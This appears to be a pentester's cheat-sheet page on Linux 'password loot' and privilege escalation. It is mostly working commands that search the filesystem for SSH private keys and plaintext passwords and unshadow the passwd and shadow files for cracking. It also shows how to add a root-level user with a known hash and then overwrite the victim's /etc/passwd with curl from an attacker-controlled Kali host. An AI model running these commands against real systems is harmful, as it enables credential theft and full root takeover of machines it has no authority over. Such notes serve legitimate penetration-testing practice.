Password Loot

Lootttt

# Locationg SSH Keys
cat /home/<user>/.ssh
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
chmod 600 id_rsa

# Finding Passwords # TAKES TIMEEE
grep --color=auto -rnw '/' -ie "PASSWORD=" --color=always 2> /dev/null

# Getting Shadow and passwd file both
unshadow <passwd file> <shadown file> > unshadowed.txt

# If password writing is visible
-> It's pwfeedback attack

# Writable passwd file + cp command
ls -la /etc/shadow
ls -la /etc/passwd # See if you can write into /etc/passwd

# On Kali, 
cp /etc/passwd passwd1

# Append chiya username to passwd1 file and cat /etc/passwd1 to see if its correct.
nano passwd1
chiya:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash

# On Victim Machine, replacing the passwd file.
curl http://<KALI IP>:<PORT>/passwd1 -o /etc/passwd

Now Login using SSH or Simply SU chiya.

Linux for Pentester: cp Privilege Escalation - Hacking ArticlesHacking Articles

PreviousInsecure File Perm NextRestrict Shell Escape

Last updated 1 year ago